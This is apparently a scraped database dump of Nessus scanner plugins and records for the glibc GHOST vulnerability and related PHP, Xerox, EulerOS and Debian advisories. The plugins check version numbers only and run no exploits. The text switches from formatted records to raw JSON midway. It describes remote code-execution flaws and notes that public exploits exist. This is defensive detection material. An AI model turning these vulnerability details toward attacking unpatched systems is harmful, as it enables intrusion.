  script_set_attribute(attribute:"see_also", value:"https://www.smacktls.com/#freak");
  # https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?c7a6ddbd");
  script_set_attribute(attribute:"solution", value:
"Apply the appropriate cumulative update as described in the Xerox
security bulletin in the referenced URL.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2015-0235");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_set_attribute(attribute:"exploited_by_malware", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
  script_set_attribute(attribute:"in_the_news", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2014/10/14");
  script_set_attribute(attribute:"patch_publication_date", value:"2015/08/06");
  script_set_attribute(attribute:"plugin_publication_date", value:"2015/12/11");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/h:xerox:colorqube");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"Misc.");

  script_copyright(english:"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("xerox_colorqube_detect.nbin");
  script_require_keys("www/xerox_colorqube", "www/xerox_colorqube/model", "www/xerox_colorqube/ssw");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");

# Get model and system software version
model = get_kb_item_or_exit("www/xerox_colorqube/model");
ver = get_kb_item_or_exit("www/xerox_colorqube/ssw");

# 92XX only affected
if (model !~ "^92[0-9][0-9]$")
  audit(AUDIT_HOST_NOT, "an affected Xerox ColorQube model");

# The fixed build depends on the controller family encoded in the
# second field of the system software version.
if (ver =~ "^[0-9]+\.050\.")
{
  # CBC
  fix = "061.050.225.18900";
}
else if (ver =~ "^[0-9]+\.080\.")
{
  # SBC
  fix = "061.080.225.18900";
}
else
  audit(AUDIT_INST_VER_NOT_VULN, "Xerox ColorQube " + model + " System SW", ver);

if (ver_compare(ver:ver, fix:fix, strict:FALSE) >= 0)
  audit(AUDIT_INST_VER_NOT_VULN, "Xerox ColorQube " + model + " System SW", ver);

if (report_verbosity > 0)
{
  report =
    '\n Model : Xerox ColorQube ' + model +
    '\n Installed system software version : ' + ver +
    '\n Fixed system software version : ' + fix + '\n';
  security_hole(port:0, extra:report);
}
else security_hole(0);
```

**CVSS:** 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)

## PHP 5.4.x < 5.4.38 Multiple Vulnerabilities (GHOST)

**Plugin:** PHP_5_4_38.NASL, [https://www.tenable.com/plugins/nessus/81510](https://www.tenable.com/plugins/nessus/81510)
**Type:** nessus (scanner)
**Published:** 2015-02-25; **Modified:** 2022-04-11; **Last seen:** 2023-01-11T14:48:45
**CVEs:** CVE-2014-9705, CVE-2015-0235, CVE-2015-0273
**CPE:** cpe:/a:php:php
**CVSS v2:** 10.0 (HIGH), AV:N/AC:L/Au:N/C:C/I:C/A:C; exploitability score 10.0, impact score 10.0; access vector NETWORK, access complexity LOW, authentication NONE; confidentiality/integrity/availability impact COMPLETE; user interaction required: false; obtainAllPrivilege/obtainUserPrivilege/obtainOtherPrivilege: false
**CVSS v3:** none recorded

**Description:** According to its banner, the version of PHP 5.4.x installed on the remote host is prior to 5.4.38. It is, therefore, affected by multiple vulnerabilities :

- A heap-based buffer overflow flaw in the enchant_broker_request_dict function in ext/enchant/enchant.c could allow a remote attacker to cause a buffer overflow, resulting in a denial of service condition or the execution of arbitrary code. (CVE-2014-9705)
- A heap-based buffer overflow flaw in the GNU C Library (glibc) due to improperly validating user-supplied input in the glibc functions __nss_hostname_digits_dots(), gethostbyname(), and gethostbyname2(). This allows a remote attacker to cause a buffer overflow, resulting in a denial of service condition or the execution of arbitrary code. (CVE-2015-0235)
- A use-after-free flaw exists in the function php_date_timezone_initialize_from_hash() within the 'ext/date/php_date.c' script. An attacker can exploit this to access sensitive information or crash applications linked to PHP. (CVE-2015-0273)

Note that Nessus has not attempted to exploit these issues but has instead relied only on the application's self-reported version number.

**Plugin source:**

```nasl
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(81510);
  script_version("1.20");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  script_cve_id("CVE-2014-9705", "CVE-2015-0235", "CVE-2015-0273");
  script_bugtraq_id(72325, 72701, 73031);
  script_xref(name:"CERT", value:"967332");

  script_name(english:"PHP 5.4.x < 5.4.38 Multiple Vulnerabilities (GHOST)");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server uses a version of PHP that is affected by
multiple vulnerabilities.");
  script_set_attribute(attribute:"description", value:
"According to its banner, the version of PHP 5.4.x installed on the
remote host is prior to 5.4.38. It is, therefore, affected by multiple
vulnerabilities :

  - A heap-based buffer overflow flaw in the
    enchant_broker_request_dict function in
    ext/enchant/enchant.c could allow a remote attacker
    to cause a buffer overflow, resulting in
    a denial of service condition or the execution of
    arbitrary code. (CVE-2014-9705)

  - A heap-based buffer overflow flaw in the GNU C Library
    (glibc) due to improperly validating user-supplied input
    in the glibc functions __nss_hostname_digits_dots(),
    gethostbyname(), and gethostbyname2(). This allows a
    remote attacker to cause a buffer overflow, resulting in
    a denial of service condition or the execution of
    arbitrary code. (CVE-2015-0235)

  - A use-after-free flaw exists in the function
    php_date_timezone_initialize_from_hash() within the
    'ext/date/php_date.c' script. An attacker can exploit
    this to access sensitive information or crash
    applications linked to PHP. (CVE-2015-0273)

Note that Nessus has not attempted to exploit these issues but has
instead relied only on the application's self-reported version number.");
  script_set_attribute(attribute:"see_also", value:"http://php.net/ChangeLog-5.php#5.4.38");
  script_set_attribute(attribute:"see_also", value:"https://bugs.php.net/bug.php?id=68925");
  script_set_attribute(attribute:"see_also", value:"https://bugs.php.net/bug.php?id=68942");
  # https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?c7a6ddbd");
  script_set_attribute(attribute:"solution", value:
"Upgrade to PHP version 5.4.38 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2015-0235");

  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_set_attribute(attribute:"exploited_by_malware", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
  script_set_attribute(attribute:"in_the_news", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2015/01/12");
  script_set_attribute(attribute:"patch_publication_date", value:"2015/02/19");
  script_set_attribute(attribute:"plugin_publication_date", value:"2015/02/25");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:php:php");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("php_version.nasl");
  script_require_keys("www/PHP");
  script_require_ports("Services/www", 80);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");

port = get_http_port(default:80, php:TRUE);

php = get_php_from_kb(
  port : port,
  exit_on_fail : TRUE
);

version = php["ver"];
source = php["src"];

# Distribution builds that backport fixes keep the old version string,
# so skip them unless paranoid reporting is requested.
backported = get_kb_item('www/php/'+port+'/'+version+'/backported');

if (report_paranoia < 2 && backported) audit(AUDIT_BACKPORT_SERVICE, port, "PHP "+version+" install");

# Check that it is the correct version of PHP
if (version =~ "^5(\.4)?$") audit(AUDIT_VER_NOT_GRANULAR, "PHP", port, version);
if (version !~ "^5\.4\.") audit(AUDIT_NOT_DETECT, "PHP version 5.4.x", port);

# 5.4.0 through 5.4.37 are affected
if (version =~ "^5\.4\.([0-9]|[12][0-9]|3[0-7])($|[^0-9])")
{
  if (report_verbosity > 0)
  {
    report =
      '\n Version source : '+source +
      '\n Installed version : '+version +
      '\n Fixed version : 5.4.38' +
      '\n';
    security_hole(port:port, extra:report);
  }
  else security_hole(port);
  exit(0);
}
else audit(AUDIT_LISTEN_NOT_VULN, "PHP", port, version);
```

**CVSS:** 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)

## PHP 5.4.x < 5.4.38 / 5.5.x < 5.5.22 / 5.6.x < 5.6.6 (record continues beyond this excerpt)

**Last seen:** 2023-02-18T15:22:58

**Description:** Versions of PHP 5.4.x earlier than 5.4.38, 5.5.x earlier than 5.5.22, or 5.6.x earlier than 5.6.6 are exposed to the following issues :

- A heap-based buffer overflow flaw in the GNU C Library (glibc) due to improperly validating user-supplied input in the glibc functions __nss_hostname_digits_dots(), gethostbyname(), and gethostbyname2(). This allows a remote attacker to cause a buffer overflow, resulting in a denial of service condition or the execution of arbitrary code. (GHOST) (Bug 68925 / CVE-2015-0235)
- A use-after-free flaw exists in the function php_date_timezone_initialize_from_hash() within the 'ext/date/php_date.c' script. An attacker can exploit this to access sensitive information or crash applications linked to PHP. (Bug 68942 / CVE-2015-0273)
- A use-after-free flaw exists in the function 'phar_rename_archive' in the source file 'phar_object.c'. An attacker can cause a denial of service or possibly have unspecified other impact via vectors that trigger an attempted renaming of a Phar archive to the name of an existing file. (Bug 68901 / CVE-2015-2301)
- A heap-based buffer overflow flaw affects the 'enchant_broker_request_dict' function in the source file 'ext/enchant/enchant.c'. This allows remote attackers to execute arbitrary code via vectors that trigger creation of multiple dictionaries.
(Bug 68552 / CVE-2014-9705) ", "cvss3": {}, "published": "2015-04-09T00:00:00", "type": "nessus", "title": "PHP 5.4.x < 5.4.38 / 5.5.x < 5.5.22 / 5.6.x < 5.6.6 Multiple Vulnerabilities (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9705", "CVE-2015-0235", "CVE-2015-0273", "CVE-2015-2301"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:/a:php:php"], "id": "8677.PRM", "href": "https://www.tenable.com/plugins/nnm/8677", "sourceData": "Binary data 8677.prm", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:44:26", "description": "According to its banner, the version of PHP 5.6.x installed on the remote host is prior to 5.6.6. It is, therefore, affected by multiple vulnerabilities :\n\n - A heap-based buffer overflow flaw in the GNU C Library (glibc) due to improperly validating user-supplied input in the glibc functions __nss_hostname_digits_dots(), gethostbyname(), and gethostbyname2(). This allows a remote attacker to cause a buffer overflow, resulting in a denial of service condition or the execution of arbitrary code. (CVE-2015-0235)\n\n - A use-after-free flaw exists in the function php_date_timezone_initialize_from_hash() within the 'ext/date/php_date.c' script. An attacker can exploit this to access sensitive information or crash applications linked to PHP. (CVE-2015-0273)\n\n - An XML External Entity (XXE) flaw exists in the PHP-FPM component due to improper parsing of XML data. 
A remote attacker can exploit this, via specially crafted XML data, to disclose sensitive information or cause a denial of service. (CVE-2015-8866)\n\nNote that the scanner has not attempted to exploit these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2019-01-09T00:00:00", "type": "nessus", "title": "PHP 5.6.x < 5.6.6 Multiple Vulnerabilities (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9705", "CVE-2015-0235", "CVE-2015-0273", "CVE-2015-8866"], "modified": "2022-10-26T00:00:00", "cpe": ["cpe:2.3:a:php:php:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98829", "href": "https://www.tenable.com/plugins/was/98829", "sourceData": "No source data", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-11T00:25:01", "description": "According to the versions of the glibc packages installed, the EulerOS Virtualization for ARM 64 installation on the remote host is affected by the following vulnerabilities :\n\n - stdlib/canonicalize.c in the GNU C Library (aka glibc or libc6) 
2.27 and earlier, when processing very long pathname arguments to the realpath function, could encounter an integer overflow on 32-bit architectures, leading to a stack-based buffer overflow and, potentially, arbitrary code execution.(CVE-2018-11236)\n\n - An AVX-512-optimized implementation of the mempcpy function in the GNU C Library (aka glibc or libc6) 2.27 and earlier may write data beyond the target buffer, leading to a buffer overflow in\n __mempcpy_avx512_no_vzeroupper.(CVE-2018-11237)\n\n - elf/dl-load.c in the GNU C Library (aka glibc or libc6) 2.19 through 2.26 mishandles RPATH and RUNPATH containing $ORIGIN for a privileged (setuid or AT_SECURE) program, which allows local users to gain privileges via a Trojan horse library in the current working directory, related to the fillin_rpath and decompose_rpath functions. This is associated with misinterpretion of an empty RPATH/RUNPATH token as the './' directory. NOTE: this configuration of RPATH/RUNPATH for a privileged program is apparently very uncommon most likely, no such program is shipped with any common Linux distribution.(CVE-2017-16997)\n\n - A heap-based buffer overflow was found in glibc's\n __nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application.(CVE-2015-0235)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2019-05-14T00:00:00", "type": "nessus", "title": "EulerOS Virtualization for ARM 64 3.0.1.0 : glibc (EulerOS-SA-2019-1386)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-0235", "CVE-2017-16997", "CVE-2018-11236", "CVE-2018-11237"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:glibc", "p-cpe:/a:huawei:euleros:glibc-all-langpacks", "p-cpe:/a:huawei:euleros:glibc-common", "p-cpe:/a:huawei:euleros:glibc-devel", "p-cpe:/a:huawei:euleros:glibc-headers", "p-cpe:/a:huawei:euleros:libnsl", "p-cpe:/a:huawei:euleros:nscd", "cpe:/o:huawei:euleros:uvp:3.0.1.0"], "id": "EULEROS_SA-2019-1386.NASL", "href": "https://www.tenable.com/plugins/nessus/124889", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(124889);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2015-0235\",\n \"CVE-2017-16997\",\n \"CVE-2018-11236\",\n \"CVE-2018-11237\"\n );\n script_bugtraq_id(\n 72325\n );\n\n script_name(english:\"EulerOS Virtualization for ARM 64 3.0.1.0 : glibc (EulerOS-SA-2019-1386)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization for ARM 64 host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the glibc packages installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerabilities :\n\n - stdlib/canonicalize.c in the GNU C Library (aka glibc\n or libc6) 2.27 and earlier, when processing very long\n pathname arguments to 
the realpath function, could\n encounter an integer overflow on 32-bit architectures,\n leading to a stack-based buffer overflow and,\n potentially, arbitrary code execution.(CVE-2018-11236)\n\n - An AVX-512-optimized implementation of the mempcpy\n function in the GNU C Library (aka glibc or libc6) 2.27\n and earlier may write data beyond the target buffer,\n leading to a buffer overflow in\n __mempcpy_avx512_no_vzeroupper.(CVE-2018-11237)\n\n - elf/dl-load.c in the GNU C Library (aka glibc or libc6)\n 2.19 through 2.26 mishandles RPATH and RUNPATH\n containing $ORIGIN for a privileged (setuid or\n AT_SECURE) program, which allows local users to gain\n privileges via a Trojan horse library in the current\n working directory, related to the fillin_rpath and\n decompose_rpath functions. This is associated with\n misinterpretion of an empty RPATH/RUNPATH token as the\n './' directory. NOTE: this configuration of\n RPATH/RUNPATH for a privileged program is apparently\n very uncommon most likely, no such program is shipped\n with any common Linux distribution.(CVE-2017-16997)\n\n - A heap-based buffer overflow was found in glibc's\n __nss_hostname_digits_dots() function, which is used by\n the gethostbyname() and gethostbyname2() glibc function\n calls. A remote attacker able to make an application\n call either of these functions could use this flaw to\n execute arbitrary code with the permissions of the user\n running the application.(CVE-2015-0235)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1386\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b355490c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected glibc packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-0235\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:glibc-all-langpacks\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:glibc-headers\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libnsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"glibc-2.28-9.h1\",\n \"glibc-all-langpacks-2.28-9.h1\",\n \"glibc-common-2.28-9.h1\",\n \"glibc-devel-2.28-9.h1\",\n \"glibc-headers-2.28-9.h1\",\n \"libnsl-2.28-9.h1\",\n \"nscd-2.28-9.h1\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : 
rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:48:31", "description": "Several vulnerabilities have been fixed in eglibc, Debian's version of the GNU C library :\n\n - CVE-2015-0235 Qualys discovered that the gethostbyname and gethostbyname2 functions were subject to a buffer overflow if provided with a crafted IP address argument.\n This could be used by an attacker to execute arbitrary code in processes which called the affected functions.\n\n The original glibc bug was reported by Peter Klotz.\n\n - CVE-2014-7817 Tim Waugh of Red Hat discovered that the WRDE_NOCMD option of the wordexp function did not suppress command execution in all cases. This allows a context-dependent attacker to execute shell commands.\n\n - CVE-2012-6656 CVE-2014-6040 The charset conversion code for certain IBM multi-byte code pages could perform an out-of-bounds array access, causing the process to crash. 
In some scenarios, this allows a remote attacker to cause a persistent denial of service.", "cvss3": {}, "published": "2015-01-28T00:00:00", "type": "nessus", "title": "Debian DSA-3142-1 : eglibc - security update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-6656", "CVE-2014-6040", "CVE-2014-7817", "CVE-2015-0235"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:eglibc", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DSA-3142.NASL", "href": "https://www.tenable.com/plugins/nessus/81029", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3142. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81029);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-6656\", \"CVE-2014-6040\", \"CVE-2014-7817\", \"CVE-2015-0235\");\n script_bugtraq_id(69472, 71216, 72325);\n script_xref(name:\"CERT\", value:\"967332\");\n script_xref(name:\"DSA\", value:\"3142\");\n\n script_name(english:\"Debian DSA-3142-1 : eglibc - security update\");\n script_summary(english:\"Checks dpkg output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been fixed in eglibc, Debian's version of\nthe GNU C library :\n\n - CVE-2015-0235\n Qualys discovered that the gethostbyname and\n gethostbyname2 functions were subject to a buffer\n overflow if provided with a crafted IP address argument.\n This could be used by an attacker to execute arbitrary\n code in processes which called the affected functions.\n\n The original glibc bug was reported by Peter Klotz.\n\n - CVE-2014-7817\n Tim Waugh of Red Hat discovered that the WRDE_NOCMD\n option of the wordexp function did not suppress command\n execution in all cases. This allows a context-dependent\n attacker to execute shell commands.\n\n - CVE-2012-6656 CVE-2014-6040\n The charset conversion code for certain IBM multi-byte\n code pages could perform an out-of-bounds array access,\n causing the process to crash. 
In some scenarios, this\n allows a remote attacker to cause a persistent denial of\n service.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-0235\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2014-7817\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2012-6656\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2014-6040\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-0235\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2015/dsa-3142\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the eglibc packages.\n\nFor the stable distribution (wheezy), these problems have been fixed\nin version 2.13-38+deb7u7.\n\nFor the upcoming stable distribution (jessie) and the unstable\ndistribution (sid), the CVE-2015-0235 issue has been fixed in version\n2.18-1 of the glibc package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
